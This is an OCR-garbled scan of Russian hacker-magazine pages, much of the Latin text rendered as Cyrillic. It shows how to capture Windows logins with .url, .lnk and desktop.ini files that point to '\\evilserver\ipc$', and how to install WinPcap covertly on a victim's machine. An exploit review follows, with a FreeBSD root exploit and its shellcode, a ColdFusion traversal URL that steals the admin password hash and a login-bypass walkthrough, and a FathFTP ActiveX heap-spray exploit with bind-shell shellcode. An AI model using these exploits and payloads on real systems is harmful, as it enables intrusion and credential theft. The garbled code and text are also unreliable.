В нашей стране ПОКА ЧТО все нетакжестко, но найти кого-либо 
физически — не такая уж и проблема. Себя я нашел тремя различными 
путями! 



Говоря про «стандартные возможности», я имею в видуто, как Проводник 
винды обрабатывает некоторые виды файлов. К ним относятся Іпк (ярлы- 
ки), игі (ярлыки интернета) и сіезкіюр.іпі (настройка отображения папок). В 
них можно указывать путь к нашему серверу. И когда пользователь будет 
просматривать папкусэтими файлами через Проводник (ТоІаЮоттапбег 
вроде ведетсебя также), то Проводникавтоматически подключится к 
нашему серверу и попытается авторизоваться, что нам итребуется. Итак, 
создаем игі-файл. Пишем в текстовый файл следующее и сохраняем с 
расширением игі: 

[ ІпДегпеЦЗЪогЦсиЦ ] 

ШЬ=Ъ.ЦЦр: / /шт. ехатріе . сот 
ІсопРі1е=\\еѵі1зегѵег\ірс$ 

Где I со пРіІе — указатель на файл иконки, который ссылается на наш сервер; 



► 040 
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1)РІ_ — куда перейдет пользователь, если за пустит этот файл. 

Проводник, заходя в папкусэтим игі-файлом, подгружает и кон кус нашего 
сервера, пользователь же ничего плохого заметить не может — ярлык 
может ссылаться на что-то нужное. 

С Іпкточнотакая же логика. В нем можно задать путь до иконки. Воттолько 
формат ярлыка не позволит отредактировать его в текстовике. Можно 
стандартными средствами винды создать ярлычок и в его настройках про- 
писать путьдо иконки, а потом изменитьего в НЕХ- редакто ре. 

Далее — безкЬр.іпі. Это файл настройки отображения системных папок. В 
нем можно прописать ссылки на наш сервер в разных местах, но и реакция 
Проводника будет разной: 

В ІсопРіІе — читается, когда проводник входит в папку, где находится под- 
папка, в которой лежит наш безкЬр.іпі; 

І_осаІІ2ебНе5оигсе№те — аналогично; 

ІпіюТір — когда выбираютпапкусбезкіор.іпі; 
безкіор.іпі — когда Проводник входит в папку. 

Пример сбезкіор.іпі и всеми методами: 

[ . 8ке11С1аззІпі:о] 

сіезккор . іпі=@\\еѵі1зегѵег\ірс$ , -1 
ІпНоТір=@\ \еѵі1зегѵег\ірс$ , -1 
Ьоса1іге<іКезоигсеКате=@\ \еѵі1зегѵег\ірс$ , -1 



ІсопРі1е=\\еѵі1зегѵег\ірс$ 

Для того, чтобы безкЬр.іпі заработал, есть однотребование — он должен 
лежать в системной папке. Сделать папку системной можно командой в 

КОНСОЛИ: 

аРРгіЬ +з имя_папки 

Зато у методов с иконками есть косяк — если ссылаться не на иконку, то 
пользователю будет отображаться стандартная виндовая иконка неизвест- 
ного файла, что палевно. Но это тоже можно поправить. 

Какобычно, для каждой ситуации свое. Данныеспособы были почерпнуты 
с уже упомянутого сайта парочки ресерчеров. На нем же выложена тулза 
(іагагсо.огд/зесигКѵ/раѵІоаб/іпбех.ЫтІ ]. которая может быстренько гене- 
рить файлы перечисленных видов, плюс классические — вставка ссылокв 
Ыті и бос (ррС хіз] файлы. 

Смысла большого в ней не вижу, разве что для генерации Іпк-файлов: 

рауіоасі.ехе -к 1 -сі \\еѵі1зегѵег\ірс$ 

Где -Ц — указываем тип — Іпк-файл; 

-б — путь к нашему серверу. 



Автоматический коннект кудаленному ресурсу при просмотре папки 



Зоигса 


йнЬпаКюп 


РШосоЯ 


ЬЛ* 






192+168.146,129 


192,168.146,1 


ТСР 


паѵі $рЬаге > 


П«СЫ05-55П [5УМ] 


5вч-0 и іп- Ы240 и«п- 


192.168.146.1 


19?-168-14Й.129 


тср 


ГНИГЬ-І 05-4511 і 


. Г>і.и1:рьвгв Гзѵы. 


лекЗ 5*4-0 АСк-1 Ѵгіп 



192.163.146.1 
192.163.146.129 

132.163. 146.1 

132. 168. 146. 123 

шт&тттч 

1924168.14 6.129 

ізглбэ. 146.1 

192.163.146.123 

192.168.146.1 

192.163.146.129 

192.163.146.1 
192.163.146.125 
192*168. 14 6. 1 
192*163. 14 й. 129 

192.168.146.1 
192 , 163 . 14 6 . 1 2 9 

192.163. 146. 1 

192.168.145. 129 

192.168.146. 1 



192.163.146.125 

192.163.146.1 
192.166.146.129 

132.166.146.1 

ЕШІИ-ДІШІІ 



192+163 
192 Л 63 
192 + 16В 
192.168 
192.166 
192.168 
192Л68 
192*168 
192 Л6В 
192 Л 63 
192.168 
192.16В 
192.163 
192 Л 63 



- 146 Л 
«146,129 
Л 4 6, 1 
.146.129 
.146.1 
.146.129 
146.1 
146.129 
146.1 
146.129 
146 Л 
14 6 Л 29 
146.1 
146.129 



НВ5Е 
5НВ 
5МВ 

5МѲ 

зме 

5МѲ 

5М8 

5НВ 

ІЛММАМ 

ілтъы 

5НВ 

5МВ 

5МБ 

5НВ 

5МВ 

5МВ 

5МВ 

знв 



ро:тѵй гййрог\$й 

N0 дог 1 ах й ргшосоі 

Медшііаге РгогосоТ йезраііЕе 

5#53ІОП 5егир Апбх РечиевТр ІЧТЬМ58Р И ЛБСОТІАТЕ 

зеЕііоп зегир Апсіх Редие^, ічтімз5Р^тн + \ 

5й^іір Апсіх 

Тгее Соппесі ДпЬХ РагЬ: V \ІРСІ 

Тгев Соплесі Апйх Реъропіе 

меі5егѵегЕпцт2 Рецие*!:, могЬзгаНоп, зегѵег, зді_ зе 

М«5егѵегЕпут2 Резропіе 

ДпеІХ Реіравде 
тге-е р^и^т: 

тгее рі$сотвст: пэрстве 

5Ё55 1ЙП 5ЁГир АЛЙХ ЫТЬМ55Р_МЕСОТІ ДТ Е 

»5*10П 5ЙТир АПСІХ Д^рйЛ5& г МТШаЭР.СНА^І-ЕМаЕ, ЕГГ 

5№1оп зеяіір алсіх рериеэі, мтіМ55Р_аш р н* ііеёг: \ 

бзе&Іоп зетир агіСГа пеЕрасне 




ЗАДАЧА: ВТИХАРЯ УСТАНОВИТЬ 
ѴѴШРСАР 



РЕШЕНИЕ: 

Большинство самых приятныххакерских штуковин, ксожалению, просто так 
в Винде не работают. Им, какминимум, ѴѴіпРсар нужен. По идее, начиная с 
ХР, доступ к гаѵѵ-сокета месть, нотолион нетакхорош, либо из-за удобства 
(совместимость с ІіЬрсар’ом] пользуются именно ѴѴіпРсар. При взломахэто 
напрягает. Вот втом же Меіазріоібе есть модуль для удаленного снифинга тра- 
фика, то естьна машинежертвы, но подѴѴіп не работает (ксожалению]. Ктому 
же, в прошлом номере я писал про ппеіегргеіег через істр-туннель, который 
та кже требовал ѴѴіпРсардля своей работы. После поставленной задачи были 
проведены небольшие изыскания, и проблема решилась. Оказалось, что все 
достаточно просто, хотя различные разработчики ПО «тихий установщик» и 
п редл а га ют за ден ежку. Т ребуется всего л и ш ь ско п и ровать фа й л ы : 



1) "ѵтрсар . сііі " в С : \ШШСЖ8\зузкет32 \ 

2) " Раскек . <611 " в С : \ЖКБ(Ж5\зузкет32\ 

3) "рккгеасІѴС . <611 " в С : \ѴШТОШ5\зузкет32 \ 

4 ) "прк . зуз " в С : \ШШ(ЖЗ\зузкет32 \с!гіѵегз\ 

Первыетри можно не копировать в системную директорию, а кинуть в 
туже папку, что и прогу, которой нужен ѴѴіпРсар. При этом, во-первых, 
каждому ПО потребуются свои библиотеки, а во-вторых, нам все равно 
нужно копировать прЕзуз в папку с дровами, то есть и права нужны 
соответствующие. 

Что самое приятное — библиотеки ѴѴіпРСар не палятся антивируса- 
ми (как бы и повода нету), потому обнаружить их достаточно трудно, 
и все вместе почти ничего не весят (500 Кб]. При использовании 
б и бл и отек та кже требуются ад мине кие права, но если прописать 
драйвер прЕзуз на загрузку при старте системы, то это ограничение 
снимается, т 
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■ ■ Алексей Синцов, ОідЛа15есигі1:уа.5ІпІ50Ѵ@{І5ес.ги 




ЕХРЮІТЗ 

КЕѴІЕѴѴ 




Г5 


1 





I ОБЗОР . 
ЭКСПЛОИТОВ 



ВЫПОЛНЕНИЕ ПРОИЗВОЛЬНОГО КОДА 
ПРИ ОТКРЫТИИ РОР-ФАЙЛА В 105 

Арріе іРЬопе 3/30/305 
Арріе іРосІ 
Арріе іРасІ 
Арріе Ю53.Х/4.0.Х 

виз 

СѴЕ-20 10-1797 

ЯП 

Перед нашими глазами отличный примертого, какуязвимость и экс- 
плойт работают на «благо» пользователей. Дело в том, что все мы знаем 
протакой популярный и модный продукт, как, например, іРЬопе. Также 
мы знаем, что наши действия в этом потенциально отличном девайсе 
сильно урезаны. Ни поднять тебе 55Н -сервер, ни ском пилить второй 
квейк... Понятно, что телефон должен звонить, а не компилировать, но не 
за та кие деньги. Посемухакеры регулярно выкладываюттак называе- 
мые ЗаіІЬгеак’и. Дословно переводится как«побег изтюрьмы строго 
режима им. 0тива Джобса». Такие «патчи» нелицензионны и аморальны 
(но за конны], та к как оставляют без денег производителей ПО для мага- 
зина АррЗіоге, что торгует софтом для яблочных девайсов. Так причем 
тут обзор эксплойтов? Да притом, что последний За іІЬгеак, который был 
реализован твиттер- юзером (Эсотех и его командой (іРЬопе ОеѵТеат), 
использовал уязвимости Осіау в ПО Арріе. Результат работы был проде- 
монстрирован на Оеісоп 18. Таквот, внедрение кода было осуществлено 
через две Обаууязвимости: одна в РОР-читалке, встроенной втелефон, 
а вторая — в ядре І05. Таким вотобразом можно весело расширять 
функционал іРЬопе — с помощью хороших эксплойтов. Детали эксплой- 
та не особо распространяются, оно и понятно, ведь эта брешьеще не 
исправлена, а, значит, попади это оружие в руки «злых» дядей, то вполне 
возможна попытка построения ботнета на основе Арріе-устройств. 



ЕХРЮІТ 



Кое-что, все же, об том эксплойте известно. Перво-наперво взглянем на 
содержимое РОР-файла: 

13 0 оЪ| 

« / ЗиЫіуре / Ту ре 1 С 



/РіІСег [ /РІабеБесосІе] 

/БепдбЬ 107 09» 

зДгеаш 

хк>н} 

б Чцо 7 -гІбсО ! 

.... вырезано много байт. . . . 

епбзбгеат 

епсіобд 

15 0 об] 

« /Туре /РопбБезсгірбог /Азсепб 750 /СарНеідЬб 676 / 
Безсепб -250 /Ріадз 32 

/РопбВВох [-203 -428 1700 1272] /РопбБате /СЗБІ2Б+Тішез- 
Когпап /ІбаІісАпдІе 

0 /ЗбетѴ 0 /МахМббЬ 1721 /ХНеідйб 461 /РопбРіІеЗ 13 0 К 
» 

епбоЬз 

0обственно, тут и зарыта первая уязвимость — ошибка при обработке 
Туре 1 0-шрифтов, где, судя по всему, происходит захват стека через пере- 
полнение буфера. Каквидно, 1 5 объект ссылается на описание шрифтов, 
на объект 13 (/РопіРіІеЗ 13 О Р], где у нас описан Туре 1 0-шрифт. В формате 
описания (0РР - Оотрасі Ропі Рогтаі) и скрыта ошибка. А что у настам, 
где вырезано много байт? 0удя потэгу/РіІІегІ/РІаІеОесобе], там у нас 
«закодированая» область, которая легко декодируется с помощью РОРТК 
(скачать с гуи-интерфейсом можнотѵт: раеЬЫе/рсНУдиі рсШк.ЫппІ ). В ре- 
зультате вместо каши мы получили почти читаемый код, вернее сначала 
мы видим 0РР-описание, где есть триггер уязвимости (точно неизвестно, 
где — надо курить ман по 0РР), и далее, судя по всему, РОР-программа. 
Отмотаем скроллер пониже — открытым текстом библиотека, которая 
используется для получения прав гооі'а через вторую уязвимость (при 
выделении памяти в ІОЗигІасе]. В итоге боевая нагрузка заключается в 
том, чтобы закачать ЗаіІЬгеак-софт, получить рута (и тем самым выбраться 
из песочницы — защитного механизма І05] и установить его. Вот и все. 



БОШТІОЫ 



Пока этот эксплойт используется только для За іІЬгеа к'а , но, тем не менее, 
не исключены модификации. Пока таких случаев не выявлено. Кроме 
того, патча еще нет, видимо, будет в следующей версии прошивки. Для 
тех, кто всеже использовал За і ІЬгеа к, есть возможность установить 
предупреждалку, которая при открытии РОР-файла предупреждает об 
угрозе. 




ЕХРШТ5 

КЕѴІЕѴѴ 
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ЕХРЮІТ5 

КЕѴІЕѴѴ 



ЕХРЮІТ5 

РЕѴІЕѴѴ 





ЗаіІЬгеакМе 

Ьу сотпек (еі аі.) 

^^^^“ліаіІЬгеакМе 

.ІаііЬгеак іо дві 1\л/еак5 апс] аррз 
Арріе ѵѵоп'! аИоѵѵ іо Ще Арр Зіоге. 
Ргее, (еда!. 5аіе. 

Ѵои еОоиІсі зупс ѵѵіНі іТипеа Ьеіоге 
иаіпд іРіз йэоі. 

Моге Іпіо » 

< > 



в\\6е іо іаіІЬгеак 



іРЬопе — ^іІЬгеак в действии 





ПОВЫШЕНИЕ ПРИВИЛЕГИЙ В 
РРЕЕВ50 



ТАР6ЕТ5 



РгееВЭО 7.x 
РгееВЭО 8.x 



виз 
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іРЬопе. Уязвимость в РйР 



ЕХРЮІТ 



В чем же ошибка? При вызове зепсШеО тбіТ-блоки представляют 
собой указатели на содержимое файла в кэше файловой системы. 

При этом указатели эти доступны сугубо для чтения, что логично. Но 
программисты из Бэркли совершили одну маленькую ошибочку, совсем 
крохотную — при дублировании ссылки на тЬік-блок права копируются 
некорректно, вернее, ограничение «только для чтения» не копируется в 
новом указателе (в флагах). Такое дублирование происходитпри исполь- 
зовании зепсІЯІеО, а именно — дескриптор сокета будет влиять на тЬиР 
Это фактически означает, что можно модифицировать фалы, которые для 
записи недоступны (опять же — в кэше файловой системы). Например, 
можно изменить /Ьіп/зЬ, добавив в него код, который дает права гооТ 
Рассмотрим теперь эксплойт (заточен он подх64и подх32, рассмотрим 
только х32): 



Интересная уязвимость в ОС РгееВЗБ была обнаружена исследовате- 
лем Міпд Ри. Данная уязвимость позволяетлегко получить права гооРа 
в системе. Впоследствии товарищ Кіпдсоре опубликовал эксплойт, 
реализующий эту уязвимость. Прежде чем начать описание эксплойта, 
рассмотрим некоторые объекты ОС. 

В ОС (РгееВЭО для организации межпроцессного взаимодействия и для 
работы с сетевой подсистемой используется специальный объект памя- 
ти — тЬиР В этой памяти могутхраниться, например, пакеты, которые 
передаются по сети. 

Системный вызов зепсІРІеО используется для передачи содержимого 
файла (по открытому дескриптору) в сокет. То есть, если совсем грубо — 
отправка содержимого файла посети. При этом, какпонятно, для данных 
файла используется тЬиР 

Собственно уязвимость кроется в реализации тЬіф а в эксплуатации 
помогает именно зепсШІеО. Давайте взглянем подробнее... 



шаіп (іпЦ агдс, сііаг *агдѵ[]) 

{ 

іпЦ з , Т , к2 ; 

зСгисС зоскас!с1г_іп асісіг; 

іітГ, Тіадз; 

// Шеллкод — ставит /Цтр/зЪ. владелца гооС и зСіску Ъіб 

// что означает, что данный процесс будет 

// иметь правами владельца файла, если его запустят... 

скаг збг32 [ ] = 

" \х31\хс0\х6а\х00\х68\х70\х2Г\х73\хб8\х68\х2Г\х2Г\х74\хбй\х89\хеЗ " 
"\х5 0\х50\х53\хЪ0\х10\х50\хсй\х80\х68\хес1\х0с1\х00\х00\х53\хЪ0\х0Г" 
" \х50\хсй\х80\х31\хс0\х6а\х00\хб8\х2Т\х73\хб8\х32\хб8\х2Т\х74\х6й" 
" \х7 0\х89\хеЗ\х50\х54\х53\х50\хЪ0\хЗЪ\хс<і\х80 " ; 

скаг ЬиТ [10000] ; 
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МІ рі Зв 0:00.23 [зЬ2] 

«Э рі Р+ 0:00.0’ ;з -е 

В:-, рі Зі+ 0:00. ІО [вЬ2) 

I В -Ій /гар/зЬ 

-гѵзг-зг-х 1 *сэре #5яе1 11 5580 Вчі -5 15:09 Чвр/зЬ 

і Із -іа /іар/зЪ 

-тг-ІГ-х 1 К&аре ?Ш\ 115?ЗР Оиі 23 1&:0Э ІЩІЛ 
I В -Ій Аар/зЬ 

І-тг-зг-х і ксоре 1 15540 о и- 2$ 15:09 Аар/вЬ 

: В -II /Ійр/ііі 

-гѵзг-зс-х 1 *сэре чЪ«1 115330 О 'Л ІЗ 16:09 /«р/зЬ 
: В - 1 ь /спр/зЬ 

-П»Г-вг-Х 1 №61 115530 0«1 ІЗ 16:09 А&р/Л 

: Із -Іа Цяр/зЬ 

-гск-л-х 1 Ьыре №е1 115580 <М 28 15:09 Азд/вЬ 

і В -Іа Льр/зЬ 

-іѵзг-з::-* 1 гео* ѵЬееі 1155: 0 Оиі 28 15:09 У С—р/іЬ 

I 



Кіпдсоре издевается над РгееВБй 



зіге = зЬ.зк_зіге; 
скипк = 0 ; 



іРЬопе. Декодированные строки ІІРІ_, с которых тянется «обновление» 



ска г *р ; 
зкгиск зкак зЬ; 
іпк п; 

кс!_зек мзек; 
іпк64_к зіге; 
окк_к зЬукез; 
окк_к зепк = 0; 
іпк скипк; 
іпк агск = 3 | 



/ /неблокирующее чтение 
кіадз = кспкі(к, Р_СЕТРБ) ; 
кіадз I = 0_ЖЖВЬОСК; 
кспкі(к, Р_ЗЕТРБ, кіадз); 

//шлем открытый файл через зепсИііІе ( ) в цикле 
ѵ/кііе ( зіге > 0 ) 

{ 

РБ_2ЕК0 ( &мзек ) ; 

РБ_ЗЕТ(з, &ілзек); 

п — зеіесб ( 6+1 , ШЬЬ, &1лзек, ШЬЬ , ШЬЬ) ; 

ІР (п < 0) 
сопбіпие; 



//открываем ІоорЬаск соединение 
з = зоскек (АР_ШЕТ, ЗОСК_ЗТКЕАМ, 0); 

Ьгего (&аббг, зігеок (асісіг) ) ; 
аббг . зіп_каші1у = АР_ШЕТ; 
аббг . зіп_рогк = ккопз ( 703 0 ) ; 

аббг . зіп_аббг . з_аббг = іпек_аббг ("127.0.0.1") ; 
п = соппеск(з, (зкгиск зоскаббг *)&аббг, зігеок (аббг) ) ; 

ік (п < 0) 

ілагп ("каіі ко соппеск") ; 

//Открываем /Ып/зк на чтение 
к = ореп( "/Ып/зк" , 0_КБОРГЬУ) ; 
ік ( к<0 ) 

тлагп ( " каіі ко ореп кііе" ) ; 

п = кзкак ( к , &зЬ) ; 
і к ( п< 0 ) 

тлагп ( " кзкак каііеб" ) ; 



ік (скипк > 0) 

{ 

зЬукез = 0; 
ік ( агск == 1) 

п = зепбкііе (к,з,2048*2, скипк ,ШББ , &зЬукез , 0 ) ; 
ік ( агск == 2 ) 

п = зепбкііе ( к , з , 12 04*6 , скипк, ШББ, &зЬукез , 0 ) ; 
ік (п < 0 ) 
сопкіпие; 
скипк -= зЬукез; 
зізе -= зЬукез; 
зепк += зЬукез; 
сопкіпие; 

} 

скипк = 2048; 



► 044 



шешзек(Ьик, ’\0', зізеок Ьик) ; 
ік (агск == 1) 

{ 
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бог (к2 = 0 ; к2<256 ; к2 + + ) СоШРііБІОП — ВХОДИМ В ЭДМИНКу 

{ 



Ъиб[к2] = 0x90; 



50ШТІ0Ы 



Имеется патч, который, по сути, добавляет забытый флаг — М_П00І\ІІ_Ѵ. 

р = Ъиб; 
р = р + к2 ; 



//После пор'ов добавляем шеллкод 
шетсру(р, збг32, зігеоб зРг32); 

п = к2 + зІ 2 еоб збг32; 
р = Ъиб ; 

} 

//Пишем шеллкод прямо в сокет 
//после многократного зепсібііе 
//Есть вероятность перезаписи тЬиб 
//указывающих на кэш с файлом, 
//который мы отправляли - /Ъіп/зЪ. 
шгііе ( з , р , п) ; 

} 

} 



зуз/кегп/иірс_шЬиб . с (геѵізіоп 2 09948 ) 

+ + + зуз/кегп/иірс_шЬиб . с (ѵгогкіпд сору) 

@@ -302,6 +302,7 @@ 

п->ш_ехб . геб_спб = ш->ш_ехб . геб_спЦ ; 
п->ш_ехб . ехб_Суре = ш->ш_ехб . ехб_буре ; 
п->т_б1адз | = М_ЕХТ; 

+ п->т_б1адз I = т->т_б1адз & М_КДОЖгУ; 




ОБХОД КОРНЕВОЙ ДИРЕКТОРИИ 

всоюгизюы 



ТАВСЕТ5 X 



Таким образом, для начала надо сделать копии /Ьіп/зб в Ітр: 

ср /Ьіп/зП /Ртр/зЬ. 
ср /Ьіп/зЬ /Стр/з]т2 

Затем на втором терминале (АІ_Т+Р2) открыть пеШаф чтобы слушать порт, 
куда файл слать будем... 

ПС -1 7030 

После этого скомпилируем и запустим эксплойт: 

дсс сасйе.с -о сасЬе 
. /сасПе І386 

Теперьждем около пяти минут. За это время, возможно, получится 
повредить кэш-память с содержимым /Ьіп/зб, который изменит права и 
владельцев Дтр/зЬ и за пустит Дтр/зЬ2. После этого смело запускаем/ 
Ітр/зб, и мы — гооТ 



СоШРизіоп 9 
СоШРизіоп 8 
СоШРизіоп 7 

ЕЗ 

СѴЕ-20 10-2861 

СоШРизіоп — достаточно известный и популярный язык программи- 
рования для ѴѴеЬ. Крометого, это еще и удобная платформа для раз- 
вертывания своей системы, с админкой и всем таким прочим. Но, как 
известно, ПО без ошибок не бывает. Так и с платформой СоШРизіоп, 
в скриптах которой обнаружена возможность обхода директорий и 
доступа к произвольным файлам. Уязвимость была обнаружена Ри- 
чардом Брайном (Рісбагб Вгаіп], который сообщил об этом АбоЬе. Тем 
не менее, эксплойт просочился в пабликотнекогоанонимноголица, с 
чем нас и поздравляю. 



ЮІТ 



Для некоторых скриптов платформы можноуказать локаль — язык шаб- 
лона, что несомненно, удобно, на при мер так: 
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Ц г~ 






ЬШРр : / /зегѵег/СРІБЕ/асЗтіпізЦгаЦог/епРег . с:Ет?1оса1е=ги 

При таком запросе админка будет отображена на русском языке. При 
этом «ш» — это, на самом деле, приставка к файлу с языковыми шаб- 
лонами, который и подгружается. Далее используется обыкновенная 
последовательность для выхода за директорию с шаблонами — «../». 

Но этого недостаточно, так как СоШРизіоп проверяет, чтобы «конец» 
был валидным. Поэтому в конце добавляем нулевой байт и сигнатуру 
используемой локали — «еп» (есть везде]. Тогда скрипт будет рад — в 
конце «еп», а при открытии файла он «обрубится» благодаря нулевому 
байту. Какие, собственно, файлы нас интересуют? Ну, например, файл с 
паролем администратора от платформы, который лежит в директории, 
где установлена платформа — С :/СоІсІ РизіопХ/ІіЬ/ раззѵѵогсі . ргорегіііез. 
Соответственно, эксплойт: 

Шрір : / /зегѵег/СРІБЕ/асЗшіпізІігаІіог/епЦег . сПш?1оса1е= . . 

/Со1сІРизіоп8/1іЪ/раззѵтогс1. 

ргорегСіез%00еп 

В итоге мы получим 5НА1 -хеш пароля админа. В принципе, можно уже 
идти ломать брутфорсом, но можно поступить хитрее, согласно совету 
Нильса Тьусинка (ІЧіеІзТеизіпк): 

1. Вводим на странице аутентификации (/СРІБЕ/ 
асІтіпізЦгаСог/епЦег . сНт) , в поле для пароля значение 
украденного хеша; 

2 . В адресной строке вводим з аѵазсгірД :1іех_]тппас_ 

зШаІ (сІоситепВ . ІодіпНогт. заІС . ѵаіие , сіоситепр . ІодіпНогт. 
сРасІтіпРаззѵтогсІ. ѵаіие) , жмем«ЕпСег». Записываем полу- 
ченное значение; 

3 . Жмем кнопку назад — опять оказываемся на странице ау- 
тентификации ; 

4 . Запускаем МІТМ-прокси, Нильс рекомендует Вигр, я же 
пользовался ТашрегБаСа-плагином для РігеРох; 

5 . Жмем кнопку «Ьодіп»; 

6. В перехваченном РозС-запросе редактируем поле 
сРасІтіпРаззѵтогсІ, вставляя туда записанное нами значение. 
Отсылаем отредактированный запрос; 

7 . Мы в админке ! 

Доступ к панели администратора дает полный доступ к системе; дело в 
том, что в админке есть задания по расписанию, в эти задания можно 
добавить свой скрипт на СоІсІРизіоп, который дает, например, шелл (в 
винде — права 5Ѵ5ТЕМ]. Вот, собственно, и все. 



50ШТЮЫ 



Вообще, уязвимы все версии под все ОС, однако эксплойтбыл проверен 
только на восьмой ветке. В девятой версии при настройках по умолчанию 
уязвимость не работает. В любом случае, АбоЬе выпустил ЬоШх, устраняю- 
щий проблему: абоЬе.соітѴзиррогі/зесигіІѵ/ЬиЦебпз/аргЫ 0-1 8.ЫтІ 

ВЫПОЛНЕНИЕ ПРОИЗВОЛЬНОГО КОДА 
В РАТНРТР 



ТАВ6ЕТ5 



РаіЬРТР 1.8 

гпэ 

Ы/А 

щэ 

РаіЬРТР — это программа стоимостью 79 долларов США, которая ис- 
пользуется для доступа к РТР-серверу и работы с файлами. В основ- 



ном она нужна веб-разработчикам для автоматизации работы с РТР 
посредством НТМБ, так как данный продукт — это АсІіѵеХ- компонент. 

Но, каксвойственно любому ПО, тутесть ошибки. В частности, мы имеем 
дело с переполнением буфера в стеке, которое приводит к выполнению 
произвольного кода. 



ЕХРЮІТ 



Банальная ошибка — переполнение буфера в стеке, что приводиткпе- 
резаписи данных в стеке, например, адреса дескриптора 5ЕН. Напомню, 
что данный дескриптор служит для исключительных ситуаций — напри- 
мер, что-то в программе пошло нетак, и, чтобы не упасть в лужу, нужно 
выйти «красиво». Именно для этого и служит обработчик исключи- 
тельных ситуаций. Так, например, при переполнении буфера в стеке мы 
потерли в стеке указатель на данные, заменив его каким-то мусором. В 
итоге при копировании данных возникаетошибка — указателя-то боль- 
ше нет. Тогда программа ищетпоследний обработчик исключений (кото- 
рый тоже в стеке, и который мы тоже перезаписали]. О б работник этот, по 
сути — указательна код, который должен выполниться в том случае, если 
что-то пошло нетак. Мы перезаписали этот обработчик, итеперь вместо 
кода обработки ошибки выполнится тот код, на который мы указали. 

Надо отметить, что эксплойт, который был выложен в паблике, был абсо- 
лютно не рабочим. Дело втом, что адрес, куда указывал автор эксплойта, 
был без всего — пустым. Некоторые байты в буфере при переполнении 
были не АЗСІ-символами, что привело к искажению значения, в общем, 
совершенная шляпа. На самом деле такие эксплойты за Юсекунд можно 
превратить в рабочие, для этого достаточно добавить НеарВргау (или точ- 
но вычислить адрес буфера с шеллкодом) и заменить указатель 5ЕН на ад- 
ресе шелл кодом. Если мы говорим о НеарЗргау, то середина памяти всегда 
под нашим контролем, например, будем использовать адрес ОхОСОСОСОС. 
Напомню, что НеарЗргау — это просто большой массив в памяти браузера, 
где мы пишем шеллкод. Большой динамический массив — много памяти 
в куче. Поэтому мы забираем столько памяти, чтобы адрес с шеллкодом 
можно было просто угадать — ты каешь в середину памяти, а там с большой 
вероятностью наш шеллкод (вернее, пор’ слайс — пустые операторы, а 
потом сам шеллкод]. Тогда алгоритм следующий: сначала создаем боль- 
шой динамический массив с большим куском пустых операторов — пор’ов 
(оп код — 0x90]. В конце добавляем шеллкод — открытие бэкдора на 28876 
порту. Затем формируем буфер для РаіЬРТР. Огромную строку размером 
1 540 байт. Содержимое строки, все байты, — ОхОС. Затем вызываем 
функцию компоненты — РіІеЕхізІзО, и в качестве параметра указываем 
нашу строку с ОхОС. Функция начнетобрабатывать параметр и скопирует 
его в свою переменную, но памяти для переменной выделено меньше, чем 
1540 байт. В итоге остальные байты строки будут скопированы вне буфера 
в стеке, затирая все то, что лежит в памяти за переменной, включая адрес 
обработки исключительной ситуации. В р езул ьтате 5 ЕН -указатель ста нет 
равным ОхОСОСОСОС. После этого произойдетсбой в работе функции при 
копировании данных, что вызовет обработку исключительной ситуации. 
Программа возьмет адрес обработчика из стека, из вершины цепочки 
ЗЕН-адресов. Именно этот адрес мы и перезаписали, поэтомууправление 
перейдет по адресу ОхОСОСОСОС. К великой удаче именно по этому адресу 
находится один из элементов динамического массива, который мы создали 
в самом начале (НеарЗргау]. Поэтому содержимое этого массива будет ин- 
терпретировано как исполняемый код и исполнено. Процессор пройдется 
по цепочке 0x90 — пустым операторам — и дойдет до шеллкода, который и 
будет выполнен. Сам эксплойт прост до безумия: 

<Ылп1> 

//СЬЗІБ РаШтРТР — подгружаем уязвимый модуль 

соЪзесС с1аззіс!= ' сізісі: 62А989СЕ-Б39А-11Б5-86Р0- 

В9С370762176' іс!= * РагдеС ' ></оЬдесЦ> 

<зсгірр> 

// Шеллкод — Зкуіапсі чліп32 ЬіпсЗзШеІІ — открывает на 2 8876 

ТСР-порту сшсЗ.ехе 




► 046 
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ЕХРЮІТ5 
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сдам) 



ИСКЛЮЧИТЕЛЬНАЯ 

СИТУАЦИЯ 



ПЕРЕЗАПИС дныи 

ДЕСКРИПТОР 

06РА60ЧИКА. 



ОнОСОСОСОС - 

ядра с НварВргау 
шіллкодом 



иіі 11^ Ц. ^4 Е 'і' аН^К^ГаШ I Б <мсі^ Д і ІоІ I Л I іН I - ѴНпіЗвд ІПІіІГшІ Ь^Ьэт 



а>\і гііг^сі Г 1 , (ОИНгаВД), тогііРІ* ГМІіТГг 



:м А Ъ.І.ЕЬШ] 



^ СЛѴПЧ»тЪѵИ«гп32кпі4.ѵп ■ ™і Ьніініі Ш/4 



М)4СілМПТ( «йЛ ^ГІІП{|ІММПІП^»( ІвСДІІИВІ 
Ё№йГС НМАЬ4 XI* (ІЬдеип іг.І.НГО] 

;? Ядр-погмпіііій поИкр«сост , іэнь-заоі. 

чОосіігигіТ.е йГіЛ 5пгб іп-д і & т ^АДіпѵіп%Га<іІ и-чніі сто.і>_ 



ЕХРЮІТ5 
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І\І_ V ІІ.ѴѴ 





ШЕЛЛ КАК РЕЗУЛЫ 



Переполнение буфера в стеке — классика жанра 



ѵаг зЪ.е11 = ипезсаре ( " %и4343%и4343%и43еЬ%и5756%и458Ь%и8Ь 
Зс%и0554%и017 8%и52еа%и52 8Ь%и012 0%и31еа%и31с0%и41с9%и348 
Ь%и018а%и31ее%ис1Р:Е:%и13с:Е%и01ас%и85с7%и7 5с0%и3 9:Е6%и75с1:Ё: 
%и5аеа%и5а8Ь%и0124%иббеЬ%и0с8Ь%и8Ь4Ь%и1с5а%иеЬ01%и048Ь% 
и018Ь%и5Ре8%иР:Е5е%и:Есе0%ис031%и8Ь64%и3 040%и408Ъ%и8Ъ0с%и 
1с70%и8Ъас1%и0868%ис031%иЪ866%и6с6с%и6850%и3233%и642е%и7 
768%и3273%и545Г%и71ЪЪ%ие8а7%ие8Ге%иГГ90%иГГГГ%иеГ89%ис5 
89%ис481%иРе7 0%иРРРР%и3154%иРес0%и40с4%иЪЪ50%и7с122%и7с1а 
Ъ%и75е8%иГГГГ%и31ГГ%и50с0%и5050%и4050%и4050%иЪЪ50%и55а6 
%и7934%иб1е8%и^^^Е%и89^Е%и31сб%и50с0%и3550%и0102%исс70% 
иссРе%и8950%и50е0%и106а%и5650%и81ЪЪ%и2сЪ4%ие8Ье%иР:І:42%и 
ГГГГ%ис031%и5650%ибЗЪЪ%и58Га%ие89Ъ%иГ:Е34%иГ:Е:Е:Е:%и6058%и1 
